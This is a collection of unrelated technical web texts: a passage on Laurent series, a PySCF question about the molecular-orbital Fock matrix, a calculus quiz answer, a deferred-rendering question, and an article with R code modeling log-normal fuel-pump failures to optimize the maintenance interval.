It is possible that r may be zero or R may be infinite; at the other extreme, it's not necessarily true that r is less than R. These radii can be computed as follows:
$r = \limsup_{n\rightarrow\infty} |a_{-n}|^{1 \over n}$
${1 \over R} = \limsup_{n\rightarrow\infty} |a_n|^{1 \over n}$
We take R to be infinite when this latter lim sup is zero.
Conversely, if we start with an annulus of the form A = {z : r < |z − c| < R} and a holomorphic function f(z) defined on A, then there always exists a unique Laurent series with center c which converges (at least) on A and represents the function f(z).
As an example, let
$f(z) = {1 \over (z-1)(z-2i)}$
This function has singularities at z = 1 and z = 2i, where the denominator of the expression is zero and the expression is therefore undefined. A Taylor series about z = 0 (which yields a power series) will only converge in a disc of radius 1, since it "hits" the singularity at 1.
However, there are three possible Laurent expansions about z = 0:
• One is defined on the disc where |z| < 1; it is the same as the Taylor series.
• One is defined on the annulus where 1 < |z| < 2, caught between the two singularities.
• One is defined on the infinite annulus where 2 < |z| < ∞.
The case r = 0, i.e. a holomorphic function f(z) which may be undefined at a single point c, is especially important.
The coefficient a−1 of the Laurent expansion of such a function is called the residue of f(z) at the singularity c; it plays a prominent role in the residue theorem.
For an example of this, consider
$f(z) = {e^z \over z} + e^{1 \over z}$
This function is holomorphic everywhere except at z = 0. To determine the Laurent expansion about c = 0, we use our knowledge of the Taylor series of the exponential function:
$f(z) = \cdots + \left ( {1 \over 3!} \right ) z^{-3} + \left ( {1 \over 2!} \right ) z^{-2} + 2z^{-1} + 2 + \left ( {1 \over 2!} \right ) z + \left ( {1 \over 3!} \right ) z^2 + \left ( {1 \over 4!} \right ) z^3 + \cdots$
and we find that the residue is 2.
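This can be checked numerically (our addition): the mean of $f(z)\,z$ over a circle around the singularity picks out exactly the coefficient $a_{-1}$, since the mean of $z^m$ over the circle vanishes for every $m \neq 0$:

import numpy as np

theta = np.linspace(0.0, 2.0 * np.pi, 4096, endpoint=False)
z = np.exp(1j * theta)              # unit circle around z = 0
f = np.exp(z) / z + np.exp(1.0 / z)
print(np.mean(f * z))               # approximately (2+0j), the residue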
## Formal Laurent series
Formal Laurent series are Laurent series that are used without regard for their convergence. The coefficients ak may then be taken from any commutative ring K. In this context, one only considers Laurent series where all but finitely many of the negative-degree coefficients are zero. Furthermore, the center c is taken to be zero.
Two such formal Laurent series are equal if and only if their coefficient sequences are equal. The set of all formal Laurent series in the variable x over the coefficient ring K is denoted by K((x)). Two such formal Laurent series may be added by adding the coefficients, and because of the finiteness of the negative-degree coefficients, they may also be multiplied using convolution of the coefficient sequences. With these two operations, K((x)) becomes a commutative ring.
If K is a field, then the formal power series over K form an integral domain K[[x]]. The field of quotients of this integral domain can be identified with K((x)).
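One way to see this identification (a standard argument, added for completeness): any nonzero formal Laurent series $f = \sum_{n \ge k} a_n x^n$ with $a_k \neq 0$ factors as $f = x^k u$, where $u = a_k + a_{k+1}x + \cdots$ has an invertible constant term and is therefore a unit of $K[[x]]$. Hence $f^{-1} = x^{-k} u^{-1}$ lies in $K((x))$, so $K((x))$ is a field containing $K[[x]]$, and every element of it is a quotient of two formal power series.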
https://mattermodeling.stackexchange.com/questions/1540/how-to-calculate-the-fock-matrix-in-the-molecular-orbital-basis-pyscf
# How to calculate the Fock matrix in the molecular orbital basis PySCF?
I am interested in calculating the Fock matrix in the molecular orbital basis with PySCF, though I am not clear on the methodology behind this task.
In my attempt, I use the following script (for the example H$$_{2}$$ molecule):
from pyscf import gto, scf
geometry = '''
H 0.000 0.000 0.000
H 0.000 0.000 0.740
'''
mol = gto.Mole()
mol.atom = geometry
mol.basis = '3-21g'
mol.build()
mf = scf.RHF(mol)
mf.scf()
Fao = mf.get_fock()
Fmo = mf.mo_coeff.T @ Fao @ mf.mo_coeff
print('F_mo')
print(Fmo)
In this method, I first calculate the molecular mean-field. I then do matrix multiplication with the molecular coefficient transpose matrix (mf.mo_coeff.T), the Fock matrix in the atomic basis (Fao) and the molecular orbital coefficients (mf.mo_coeff).
The resulting off-diagonal matrix elements are essentially zero (to 10 decimal places) for the H$$_{2}$$ molecule and for larger systems (CH$$_{4}$$, NH$$_{3}$$, H$$_{2}$$O). This has confused me: I have seen other Fock matrices in the molecular orbital basis with off-diagonal elements present.
I am therefore looking for confirmation of my method, and if there is a better way of doing this task?
• The fock matrix should be diagonal. The diagonal elements are the orbital energies, no? Jul 16 '20 at 21:55
• As Cody said, the MO Fock matrix is always diagonal. The MOs are the eigenvectors of the Fock matrix.
– Tyberius
Jul 16 '20 at 23:54
• I think Cody or Tyberius can convert their comment into an answer and we can mark this question as "solved". Unless you want to show us the example to which you refer when you say: "I have seen other Fock matrices in the molecular orbital basis with off-diagonal elements present." Jul 17 '20 at 3:47
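A quick sanity check along the lines of these comments (our addition; it reuses the mf and Fmo objects from the question's script, and the tolerance is arbitrary):

import numpy as np

# For a converged SCF solution the MO-basis Fock matrix is diagonal, with
# the orbital energies (mf.mo_energy) on the diagonal.
print(np.allclose(Fmo, np.diag(mf.mo_energy), atol=1e-6))  # True
print(np.diag(Fmo))  # matches mf.mo_energy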
http://www.gradesaver.com/textbooks/math/calculus/calculus-8th-edition/chapter-10-parametric-equations-and-polar-coordinates-review-true-false-quiz-page-729/7
# Chapter 10 - Parametric Equations and Polar Coordinates - Review - True-False Quiz: 7
False
#### Work Step by Step
The first pair of equations only gives the right half of the parabola $y=x^{2}$, whereas the second pair of equations traces out the whole parabola. For example: First case: when $x=t^{2}, y=t^{4}$, then $(x,y)=(1,1)$ at $t=1$ and $(x,y)=(1,1)$ at $t=-1$, so $x$ is never negative. Second case: when $x=t^{3}, y=t^{6}$, then $(x,y)=(1,1)$ at $t=1$ and $(x,y)=(-1,1)$ at $t=-1$. Thus, the second pair of equations traces out the whole parabola $y=x^{2}$. Hence, the given statement is false.
https://gamedev.stackexchange.com/questions/48465/deferred-rendering-and-a-few-shading-functions/48468
# deferred rendering and a few shading functions
How can a few shading functions be used together with deferred rendering (for example, some objects are shaded based on a lighting equation, while others get a fixed color)? I draw a full-screen quad when shading (later I want to add optimizations for point lights). I have some idea how to solve that problem: during the g-buffer stage, a shading function id would be saved in one of the render targets. Then we can do something like this:
if(id == 0)
{
fragColor = shadingFun0(...);
}
else
{
fragColor = shadingFun1(...);
}
What do you think about that?
## 1 Answer
I believe having a lot of ifs in a fragment shader could have a serious performance impact. You could probably use the stencil buffer for this purpose.
Or save up to 4 light types in the color channels of a separate rendertarget and do this: fragColor = shadingFun0(...) * texColor.r + shadingFun1(...) * texColor.b and so on.
Or as a hack, you can manipulate the normals of some objects, so the light equation returns a different color.
Or just do multiple passes, one for each light type. So one deferred shading pass, and then you just draw the other objects on the resulting FBO (keeping the depth buffer, I guess).
Also I'm not sure about this, but isn't the whole point of using deferred shading that you can use the best lighting model for everything?
• I agree. Not only is branching like that defeating the point, it's probably a lot less efficient. – jmegaffin Jan 31 '13 at 22:43
https://objectcomputing.com/resources/publications/sett/november-2015-extracting-value-from-data
# Extracting Value from Data
By Mike Martinez, OCI Principal Software Engineer
November 2015
## Introduction
In this article, we present a model of how Big Data analytics works with an Industrial Internet of Things (IIoT) application. Our analysis revolves around a fictional gas station and convenience store chain, which we call Carmageddon.
Carmageddon represents a business that generates approximately $2 billion in annual revenue (the annual_revenue value used in the model below).
The business is made up of 700 gas stations in 20 cities, with a total of 7,000 gas pumps and 2,000 fuel tanks that have been acquired over time.
Our model simulates Carmageddon's operations.
Carmageddon is currently struggling with:
• EPA compliance
• Climbing preventive maintenance costs
• Frequent outages due to breakdowns within their aging pump and tank infrastructure
A failed pump costs approximately $3K per day, or $1M per year; an empty tank costs (in lost revenue) $7K per day, or $2.5M per year.
Carmageddon's current approach to dealing with pump and tank failures is reactive. They would like to develop a strategy and approach that enables them to be proactive in preventing sales and revenue losses.
The proposed solution is to develop an IIoT ecosystem, which takes advantage of sensors that collect data from Carmageddon's pumps and tanks and stream data to a cloud-based analytics engine, which predicts tank and pump failures and thereby empowers the business to avoid unexpected failures and losses in revenue.
This solution is demonstrated and may be viewed at: http://carma.demo.ociweb.com/.
In this article we will describe the analytics involved in establishing a maintenance interval for the fuel pumps. This solution minimizes the total cost of repairs within the context of a system that uses cloud-based processing to gather and ingest large amounts of data, present them in a useful fashion, and utilize analytic methods to generate value from the gathered data.
What follows includes a quick exploration of failure models, with the selection of a likely candidate for our model.
After that we generate some synthetic test data using the theoretical model, which will allow us to evaluate our data analysis processing. We will create an analysis mechanism that allows us to estimate model parameters given only data that we can actually collect. The simulated data is then applied to the parameter estimation mechanisms to evaluate their performance.
Once we have a model, simulated data for that model, and a processing mechanism that allows us to estimate the model parameters from measurable data, we will explore how we can use the model to predict equipment failures and how these predictions can be used to reduce the cost of failures in the corporation. This involves evaluating the different contributions to costs for failures and determining how to select a maintenance interval reducing these costs to an overall minimum.
## Overview
The first step is to derive a suitable model that determines when the simulated pumps will fail.
Next, we process our simulated data with the date of inception – when the pumps were new or last repaired – and the age at which they will fail.
From there, we illustrate how the model parameters are estimated from data and show the accuracy of this estimation process using the generated simulation data.
Once we have the model and derived parameters from the simulated data, we determine the maintenance costs for repairing the pumps.
Note that we are identifying the minimum maintenance costs (by looking at data regarding maintenance costs at different maintenance intervals) and proactively scheduling maintenance (as opposed to reacting to the actual breakdowns). This effectively reduces the amount of data that we have for estimating the parameters. Therefore, once we start the new maintenance intervals, we will need to spend a greater amount of time before reaching the same confidence in our estimated parameters.
Once we have examined the costs without using scheduled maintenance and then optimized the interval for scheduled maintenance, we obtain results that show a positive value for implementing the scheduled maintenance:
• Implementing scheduled maintenance results in a savings of 43.6% (costs are 56.4% of the base case).
• Implementing scheduled maintenance saves $1,052.48 per pump annually, or $7.4M for the corporation.
After we obtain these results, we discuss some of the issues that might arise, as well as some cautions about use of the model and subsequent parameter estimation.
## Fuel Pump Reliability
In order to determine maintenance costs for the fuel pumps, the reliability of the pumps must be modeled. Since this is a demonstration project, we can make many simplifying assumptions without losing the ability to illustrate the techniques involved in doing this.
Some conditions that we ignore include the specifics of how failures occur. We can also characterize the types of failure as an aggregate average cost for maintenance actions, rather than attempting to identify each failure case or repair result. We can also lump all of the different component lifetimes into a single time-to-failure value that represents the aggregate average over all of the components.
## Pump Survival
Pump survival to a specific age is defined as the probability that a pump has not failed when it achieves that age. Each pump fails with a probability defined by a probability density function (PDF) characteristic of the pumps. Using different density functions results in different survival curves for the pumps.
Modeling pump failures consists of assigning an initial age (date of installation or repair) to each pump, then determining failure points using the model.
Note that, once a model has been selected, processing of the inbound actual data consists of estimating the model parameters from the observed data. Predictions can then be made using the model with the best-fit parameters.
We consider two models here:
1. A constant hazard rate model
2. A log-normal failure rate model
Using R code to perform the modeling and simulation for this analysis, we start by setting up some useful values. Among the variables we create are a mean time to failure (MTTF) value and a volatility estimate, which anticipates the model that we might use.
MTTF is a common way to express the average time we expect will elapse before a product fails. That is, half of the failures will occur before this time, and half will occur after this time. (Strictly speaking, the "half before, half after" description is the median time to failure; for the log-normal model used below, where mttf enters as exp(mu), this median is exactly what the value represents.) It does not constrain the actual shape of the failures over time in any way.
The volatility estimate is a mechanism that we can use to indicate how much randomness is included in the failures. That is, a higher volatility allows a model to include failures that clump together more often than a model with lower volatility. This value will be applied differently for different models.
# Repeatability
random_seed <- 2112
set.seed(random_seed)

# Plotting X variable (months)
grid <- seq(0, 40, 0.1)

# Probability scale values
quantiles <- seq(0, 1, by = 0.01)

# Corporation parameters
annual_revenue <- 2000000000
population <- 7000

# Modeled time to failure and variability
mttf <- 34
exp_sigma <- 1.2

# Additional useful values
current_time <- Sys.time()
epoch <- '1970-1-1'
seconds_per_day <- 24 * 60 * 60
days_per_year <- 365
months_per_year <- 12
days_per_month <- round(days_per_year / months_per_year)
Failure rate models can be simple or complex. We opt for a model that is as simple as possible, while still useful. For complex products, failure rates can be created by combining failure models for smaller, simpler elements of those products. This results in very complex failure models for these products. If we accept some margin, between what a model predicts and how failures may actually occur, more simple failure models may be used to approximate more complex models.
A common failure rate model frequently used is the bathtub failure rate model. This model includes a high failure rate early in the life of a product, followed by a long period with a relatively low failure rate, then an increasing failure rate at what is referred to as end-of-life.
For our model, we simplify by assuming the high early failure rate is not present, due to the suppliers performing "burn-in" testing. This kind of testing is specifically designed to weed out products that will fail early. What remains is a long period with a low failure rate followed by increasing failures at the end of the product's lifetime.
Failure rate models have several interesting properties associated with them, including:
• Probability density function: the probability that a single failure will occur at a specific time (age)
• Cumulative density function: the proportion of a population that will fail up to a specific time
• Survival function: the proportion of a population that will not fail up to a specific time
• Hazard function: the probability that a single failure will occur in the surviving population at a specific time
We will consider two models here.
1. The first is the constant hazard rate model, which is a common failure model used to estimate how long a product will last.
2. The second is a log-normal failure model, which has a low failure rate followed by a period where the rate increases steeply.
### Constant Hazard Rate Model
The simplest failure density function is the constant hazard rate, where survival is characterized by the exponential density function. This failure rate density function includes the MTTF value, but does not include any allowance for volatility.
\begin{aligned} (1)\quad & f(t) = \lambda \mathrm{e}^{-\lambda t} & \quad\text{Probability density function} \\ (2)\quad & F(t) = 1 - \mathrm{e}^{-\lambda t} & \quad\text{Cumulative density function} \\ (3)\quad & S(t) = 1 - F(t) = \mathrm{e}^{-\lambda t} & \quad\text{Survival function} \\ (4)\quad & h(t) = \frac{f(t)}{S(t)} = \lambda & \quad\text{Hazard function} \\ \end{aligned}
exp_rate <- log(1/2) / mttf
pexp_working <- exp(exp_rate * grid)
A survival curve for this density function appears as:
We expect fuel pumps to last for a time, then fail predominantly after they reach an age where components begin to wear out. The constant hazard rate model assumes that failures occur throughout the product lifetime at a regular rate.
Clearly the constant hazard rate model does not reflect the expected failure behaviors for the pumps.
### Log-Normal Failure Rate Model
The log-normal probability distribution may be used to create a failure rate model that more closely resembles the right side of the typical failure rate “bathtub” characteristic curve describing hardware failures. The relevant formulas describing the model include:
\begin{aligned} (5)\quad & f(t) = \frac{\phi \left(\frac{\mathrm{ln}(t) - \mu}{\sigma} \right)}{ \sigma t } & \quad\text{Probability density function} \\ (6)\quad & F(t) = \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) & \quad\text{Cumulative density function} \\ (7)\quad & S(t) = 1 - F(t) = 1 - \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) & \quad\text{Survival function} \\ (8)\quad & h(t) = \frac{f(t)}{S(t)} = \frac{ \phi \left( \frac{ \mathrm{ln}(t) - \mu }{ \sigma} \right) }{ \sigma t \left[ 1 - \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) \right] } & \quad\text{Hazard function} \\ \end{aligned}
where
\begin{aligned} (9)\quad & \phi(u) = \frac{1}{\sqrt{2\pi}} \, \mathrm{e}^{^{-u^2}/_2} & \quad\text{Standard normal probability density function} \\ (10)\quad & \Phi(u) = \int\limits_{-\infty}^u \phi(z)\,\mathrm{d}z & \quad\text{Standard normal cumulative density function} \\ \end{aligned}
Modeling the survival function uses the log transformed variables:
# log-normal distribution with mu of 34 months, standard deviation of 1.2 months.
mu <- log(mttf)
sigma <- log(exp_sigma)

survival <- function(mu, sigma) { plnorm(grid, mu, sigma, lower = F) }
ln_hazard <- function(mu, sigma) { dlnorm(grid, mu, sigma) / survival(mu, sigma) }
The hazard function can be derived as the ratio of the failure probability to the survival probability. This function may be used to understand the probability of failure at a particular age. It represents the probability that a pump that has survived to an age will then fail at that age.
The hazard rate in this case is the tail end of the typical bathtub curve expected for pumps. If we assume the early failures are not present due to burn-in prior to purchase, the log-normal model is suitable for modeling the pump failures.
The log-normal density function results in a survival curve that more closely resembles actual failure characteristics:
## Generating Simulated Failures
As part of the demonstration, we need to generate simulated failures. We use these simulated failures to test the parameter estimation formulas that derive the parameters from data.
Simulating the hardware failures consists of identifying the inception date for each pump, then projecting the age that each pump will fail. The inception date is the date the pump is “new,” that is, the starting point of the aging calculations.
### Simulating Age at Failure
We can generate a simulated age at failure for all of our pumps using random variates from the log-normal distribution. To find each pump's age at the first failure, we generate one random value for each of the pumps:
fail_times <- rlnorm(population,mu,sigma)
Sorting these ages and plotting the portion of surviving population against the age at failure results in the following chart:
Note that this generated simulation data resembles the theoretical survival curve very well. We are confident that age at failure is generated correctly.
### Assigning Inception Dates
The inception date for each pump is simulated as if each pump was last replaced at a random time in relation to any other pump. This is done by allowing the inception date for a pump to range from MTTF months prior to now, up to now.
For any pump that fails prior to now, the inception date is moved to that failure date, and a new age to failure is generated. This results in random ages for all of the pumps.
The date of a simulated failure is the sum of the inception date and the age to failure. Since this procedure utilizes the age at failure, to possibly adjust the inception date, these dates are derived after the age at failure data is available.
inception_age <- runif(population, 0, mttf * days_per_month)
inception_dates <- as.POSIXct(current_time - seconds_per_day * inception_age, origin = epoch)
inception_range <- range(inception_dates)
inception_quarters <- seq(inception_range[1], inception_range[2], by = "quarter")
The following histogram illustrates the distribution of inception times for the population prior to adjusting for failures earlier than now. The boxplot at the bottom shows that the distribution is uniform across the entire time period.
## Estimating Model Parameters
Once we have simulated data, we can use that as input data to simulate actual measurements and determine if we will be able to estimate the model parameters closely enough to be useful.
### Parameter Estimation Formulas
Estimating the actual parameter values for the log-normal model from measured sample data will be done using a maximum likelihood estimator for each of the two parameters. We will estimate the location ($$\hat{\mu}$$) and spread ($$\hat{\sigma}$$) parameters for the model. The exponentiation of these parameters is measured in time and can be used to characterise the age at failure for the pumps.
The values that are being used as input to the estimation formulas are the age at failure for each detected failure. This is the time at which a failure was detected to occur minus the time where the pump was considered "new". A pump is considered to be "new" when it is either replaced or repaired.
\begin{aligned} (11)\quad & \hat{\mu} = \frac{1}{n} \displaystyle\sum_{k=0}^n \mathrm{ln}(t_{fail,k} - t_{0,k}) & \quad\text{location estimation} \\ (12)\quad & \hat{\sigma} = \sqrt { \frac{1}{n} \displaystyle\sum_{k=0}^n \big( \mathrm{ln}(t_{fail,k} - t_{0,k}) - \hat{\mu} \big)^2 } & \quad\text{spread estimation} \\ \end{aligned}
Note that the input data to these estimation formulas are not directly available from actual input data. The simulated data provides this information directly.
When receiving actual measurement data, failures need to be detected first. This will be done by applying a threshold to the amount of time between sensor readings: when a reading has not been received from a sensor within this threshold, the associated pump will be considered to have failed. Once a failure has been detected in this way, the inception age (last repair or replace date) will be subtracted from the date on which the failure was detected, and the result used as the age at failure in the parameter estimation formulas.
### Parameter Estimation Performance
We examine the estimated values of the parameters, referenced back to the non-log-normal values for generated simulation data. To do so, we generate a rolling window of the observed input data for the parameters as the data is received. This gives an intuition of how the values will behave when collecting actual measurement data.
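The rolling estimates below call estimate_mu and estimate_sigma, which are not shown in the article. A minimal sketch consistent with equations (11) and (12) might be (our reconstruction, not the original code):

# Maximum likelihood estimators for the log-normal parameters, applied to
# a vector of observed ages at failure; see equations (11) and (12).
estimate_mu <- function(t) { mean(log(t)) }
estimate_sigma <- function(t) { sqrt(mean((log(t) - mean(log(t)))^2)) }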
library(zoo)

window <- 50
rolling_mu <- exp(rollapply(fail_times, window, estimate_mu, partial = T))
rolling_sigma <- exp(rollapply(fail_times, window, estimate_sigma, partial = T))

mu_range <- range(rolling_mu)
max_mu <- mu_range[2]
min_mu <- mu_range[1]
mu_error <- max(abs(mu_range - mttf))

sigma_range <- range(rolling_sigma)
max_sigma <- sigma_range[2]
min_sigma <- sigma_range[1]
var_error <- max(abs(sigma_range - exp(sigma)))

model_conditions <- matrix(
  c(log(mttf), log(max_mu), log(max_mu), log(min_mu), log(min_mu),
    sigma, log(max_sigma), log(min_sigma), log(max_sigma), log(min_sigma)),
  ncol = 2)
The plot below shows the estimated mu parameter value (translated back into months) over the first 7,000 generated data points using a 50 sample window. During this time, the estimate ranges from a low of 31.2 to a high of 36.7 months. The largest error from the actual value is 2.81 (8.26%) months.
The plot below shows the estimated sigma parameter value (translated back into months) over the first 7,000 generated data points using a 50 sample window. During this time, the estimate ranges from a low of 1.14 to a high of 1.26 months. The largest error from the actual value is 0.0634 (5.28%) months.
Comparing the survival curve of the actual age profile with the profiles derived from the estimated parameters, we can see in the chart below that the shape of the survival curve fits well, and the estimation errors bound the derived curve such that the actual curve lies within the estimated ones.
## Predictions Using the Model
Now that we have confidence in the simulation data, and the processes used to generate it, we can use the parameters estimated from that data to make some predictions.
The obvious useful prediction to make would be to estimate the age at failure, which the log-normal model estimates. So once we have the model parameters, we can estimate when pumps will fail and perform preventative maintenance, such as replacing aging pumps, prior to the actual failure.
To utilize the prediction model for the age at which pumps will fail, we will determine the costs of repairing or replacing the pumps. Then we will find when to schedule maintenance so that the total maintenance cost is minimized.
The maintenance interval is the independent variable that we optimize using the cost as the metric. The optimal value is the desired maintenance interval, and the cost of performing maintenance at that interval will result in the lowest achievable cost.
Once we select a maintenance interval, we can determine the per pump cost for the maintenance and compare that to the case where we do no scheduled maintenance. This will allow us to determine if, and if so by how much, scheduling maintenance on the pumps will reduce overall costs.
When we schedule maintenance for pumps at a certain age, it is likely that some of the pumps will fail prior to this scheduled time. There will be no reduction in costs for these pumps. Likewise there will be no increase in their maintenance cost either.
Also, preventative maintenance prior to an actual failure will result in useful life of replaced components not being utilized, which is a cost as well. These costs must be balanced by any gains realized through scheduled maintenance compared to unscheduled, emergency, repairs.
To start the prediction process, we can observe the model characteristic that allows us to determine the age at which a proportion of the entire population, or quantile, will have failed. This is the inverse of the cumulative probability function:
\begin{aligned} (13)\quad & t = F^{-1}(q) & \quad\text{Inverse cumulative density function} \\ \end{aligned}
Using this formula allows us to determine the age to schedule preventative maintenance, allowing a known portion of pumps to fail prior to this interval. The x-axis in the chart below is the quantile, or proportion of failed pumps, for which we are finding the predicted age.
# Bind the model parameter estimates to the predictions.
prediction <- function(q) { qlnorm(q, mu, sigma) }
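For example (our addition), the age by which roughly 10% of the pumps are expected to have failed:

prediction(0.10)   # about 26.9 months with the theoretical parameters mu = log(34), sigma = log(1.2)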
### Maintenance Costs
In order to determine when to schedule maintenance actions, we consider the costs for pump maintenance. Once we determine the total cost of maintenance actions at various maintenance intervals, we minimize the cost to find the interval for scheduling the maintenance actions.
To determine the cost of an individual repair, we find the average of all costs over the entire pump population. Costs to consider include: cost to repair or replace a pump, loss of revenue from a pump that is being repaired, and the loss from not utilizing the pump's full lifetime by repairing or replacing the pump before it fails.
It may be simpler to understand the cost components by analogy.
The predictions made here are similar to scheduling tire replacement. The mileage on any given tire is specific to that tire – tires are replaced as necessary and not as a group; this is similar to the age at which we perform maintenance on the pumps.
If we wait until the pumps fail, that corresponds to not replacing a tire until it goes flat. Clearly not a desirable outcome. If we schedule a tire to be replaced at a particular mileage, that corresponds to performing scheduled maintenance at a certain pump age. The cost of replacing a tire includes the cost of the replacement tire, plus labor costs, plus loss of use of the tire while it is being replaced. For the tire, loss of use is represented by miles not driven by the tire; for the pump, the loss is the time between when a repair or replacement was performed, and when the pump would have failed on its own (without maintenance).
• $$C_{\mathrm{pump}} \, = \, \$2,000.00 \,$$ – cost of a new pump (replacement cost)
If a maintenance action requires a pump replacement, this is the maximum cost for the maintenance action.
• $$C_{\mathrm{repair}} \, = \, 60\% \, C_{\mathrm{pump}} \, = \, \$1,200.00$$ – average non-replacement maintenance cost
This is the aggregate average over the entire pump population for the cost of maintenance that does not require pump replacement. This proportion holds for both scheduled and unscheduled maintenance actions.
• $$p_{\mathrm{replace}} \, = \, 20\%$$ – proportion of maintenance actions that require the pump to be replaced
This is the proportion of all repairs that require pump replacement.
• $$p_{\mathrm{discount}} \, = \, 80\%$$ – scheduled maintenance cost as a proportion of unscheduled maintenance costs
This is a reduction in maintenance costs due to the ability to leverage bulk supplier buying power and scheduled purchases, as well as the ability to schedule labor costs rather than paying a premium for unscheduled, emergency labor.
• $$mttr_{\mathrm{unscheduled}} \, = \, 7 \, \mathrm{days}$$ – mean time to repair (MTTR) for unscheduled maintenance
This is the period of time that includes: pump failure, detection of pump failure, time to schedule and repair the pump, plus the time to return the pump to operation.
• $$mttr_{\mathrm{scheduled}} \, = \, 2 \, \mathrm{days}$$ – mean time to repair (MTTR) for scheduled maintenance
This is the period of time that includes: start to completion of a scheduled maintenance plus the time to return the pump to operation.
### Repair Costs
The cost of a repair for any pump will include the parts and labor for the repair. If the repair is done on a scheduled basis, then the cost should be adjusted to account for the shorter interval (on average) requiring more maintenance (on average) than would be incurred for repairs only performed on pumps which had failed.
### Parts and Labor Costs
An unscheduled maintenance action cost will be the cost of a new pump times the number of new pumps needed, plus the cost of repair times the number of pumps repaired:
\begin{aligned} (14)\quad & C_{\mathrm{unscheduled}} = p_{\mathrm{replace}} \, C_{\mathrm{pump}} \, + \, ( 1 - p_{\mathrm{replace}} ) \, C_{\mathrm{repair}} & \quad\text{Cost of unscheduled maintenance action} \\ & = 0.2 \, \times \, \$2,000.00 \, + \, 0.8 \, \times \, \$1,200.00 & \\ & = \$1,360.00 & \\ \end{aligned}
Scheduled maintenance costs are similar to the unscheduled costs, but have a lower cost for parts and labor:
\begin{aligned} (15)\quad & C_{\mathrm{scheduled}} = p_{\mathrm{discount}} \, C_{\mathrm{unscheduled}} & \quad\text{Cost of scheduled maintenance action} \\ & = 0.8 \, \times \, \$1,360.00 & \\ & = \$1,088.00 & \\ \end{aligned}
With these two repair costs available, the repair cost as a function of the quantile of failed pumps may be derived, and from there we calculate the repair cost as a function of the maintenance interval.
\begin{aligned} (16)\quad & C_{\mathrm{maintenance}} = q \, C_{\mathrm{unscheduled}} \, + \, ( 1 - q ) \, C_{\mathrm{scheduled}} & \quad\text{Cost of maintenance action} \\ & \, = F(t) \, C_{\mathrm{unscheduled}} \, + \, S(t) \, C_{\mathrm{scheduled}} & \\ & \, = C_{\mathrm{unscheduled}} \, \left( p_{\mathrm{discount}} \, + ( 1 - p_{\mathrm{discount}} ) \, F(t) \right) & \\ & \, = \$1,360.00 \, \times \, \big( 0.8 \, + 0.2 \, \times \, F(t) \big) \, = \, \$272.00 \, \times \, F(t) \, + \, \$1,088.00 & \\ \end{aligned}
# Sequences of time values to plot against.
xvalues <- 1.2 * mttf * quantiles

# Maintenance costs given maintenance interval
c_maintenance <- function(t, mu, sigma) { 272 * plnorm(t, mu, sigma) + 1088 }
This cost as a function of the maintenance interval for the theoretical model, as well as the bounds of estimated model parameters, is shown in the chart below:
### Adjustment Due to Shorter Intervals
Since we are proposing to perform maintenance actions – and incur maintenance costs – prior to pumps actually failing, we need to account for the loss of use of the un-failed portion of the pump's lifetime.
For example, if we simply repaired each pump every week, we would not expect any failures, but we would be paying for 147 weekly repairs (34 months' worth), on average. Compare that with paying only one time if we waited for the pump to fail on its own (with no scheduled maintenance).
Remembering the tire analogy, we can think of this as the per-mile cost of the tire, times the number of miles not driven. For the pumps, this is the per-month cost of the maintenance, times the amount of time that the pump is not used.
The amount of time the pump is not used may be estimated by the MTTF value. The per-month cost for the pump is simply the cost of a maintenance event, which is identified in equation (16) as $$C_{\mathrm{maintenance}}$$, divided by the interval at which this cost is incurred. We can either compare the per-month costs for all maintenance actions or use some other common time frame.
Since companies typically account for costs annually or quarterly, we can use either of these time frames as a reference. Here, we will use annual costs, so we can simply multiply the monthly cost (maintenance costs divided by the age (in months) at which the maintenance is performed) by 12 (months in a year).
\begin{aligned} (17)\quad & C_{\mathrm{adjusted}} = & 12 \, \times \, \left( \frac{C_\mathrm{maintenance}(t_{\mathrm{interval}})}{t_{\mathrm{interval}}} \right) & \quad\text{Annualized cost of early repair} \\ \end{aligned}
# Maintenance costs given maintenance interval
c_adjusted <- function(t, mu, sigma) { 12 * c_maintenance(t, mu, sigma) / t }
The chart below illustrates this cost and shows that this is the element of cost that penalizes early maintenance with a very high cost for short intervals.
### Lost Revenue
The time when a pump is out of service – either for a scheduled maintenance event or for an emergency repair after failure – represents the loss of revenue from that pump. This is considered a cost and must be accounted for when determining the cost of scheduling maintenance for pumps.
In the assumptions, we can see that scheduled outages are much shorter (2 days) than outages due to failures (7 days). This is due to the additional time to detect the failure and schedule the repair. The actual repair time will be the same for both. The revenue lost during an outage is:
\begin{aligned} (18)\quad & C_{\mathrm{repair\ time}}(t) = \frac{\mathrm{Revenue}}{n_{\mathrm{total}} \, \times \, 365 \ \mathrm{days}} \, \times \, t & \quad\text{Lost revenue for a repair} \\ & = \, \$782.78 \, \times \, t & \quad\text{[per pump, } t \text{ in days]} \\ \end{aligned}
The cost of lost revenue for repairing or maintaining a pump depends on the number of repairs after failure(s), and the number of maintenance events prior to failures. This proportion is the quantile that we have used before.
\begin{aligned} (19)\quad & C_{\mathrm{lost\ revenue}} & = q \, C_{\mathrm{repair\ time}} \left( mttr_{\mathrm{unscheduled}} \right) & \quad\text{Cost due to lost revenue} \\ & & + \left( 1 - q \right) \, C_{\mathrm{repair\ time}} \left( mttr_{\mathrm{scheduled}} \right) & \\ & & = \$782.78 \, \times \big( 2 \, {\mathrm{days}} \, + \, q \, \left( 5 \, {\mathrm{days}} \right) \big) & \\ \end{aligned}
And now we can use the cumulative distribution to translate the formula from the quantiles to the maintenance interval. Since we want to be able to combine this cost with the maintenance cost calculated above, we go ahead and annualize the cost here as well.
\begin{aligned} (20)\quad & C_{\mathrm{lost\ revenue}} & = \frac{12}{t} \, \times \, \$782.78 \, \times \big( 2 \, {\mathrm{days}} \, + \, 5 \, {\mathrm{days}} \, \times \, F(t) \big) & \quad\text{Cost due to lost revenue} \\ \end{aligned}
# Lost-revenue costs given maintenance interval
c_lostrevenue <- function(t, mu, sigma) { 12 * 782.78 * (2 + 5 * plnorm(t, mu, sigma)) / t }
### Total Maintenance Cost
Once we have determined the annualized cost to perform the maintenance, and the cost for not having the pumps available during maintenance, we can simply combine the costs to determine the annual cost per pump. This may be compared with the cost of not performing scheduled maintenance, and highlights the benefit of scheduled maintenance. The total cost is the sum of the individual costs:
\begin{aligned} (21)\quad & C_{\mathrm{total}} \, = \, & C_{\mathrm{adjusted}} \, + \, C_{\mathrm{lost revenue}} & \quad\text{Total cost per pump} \\ \end{aligned}
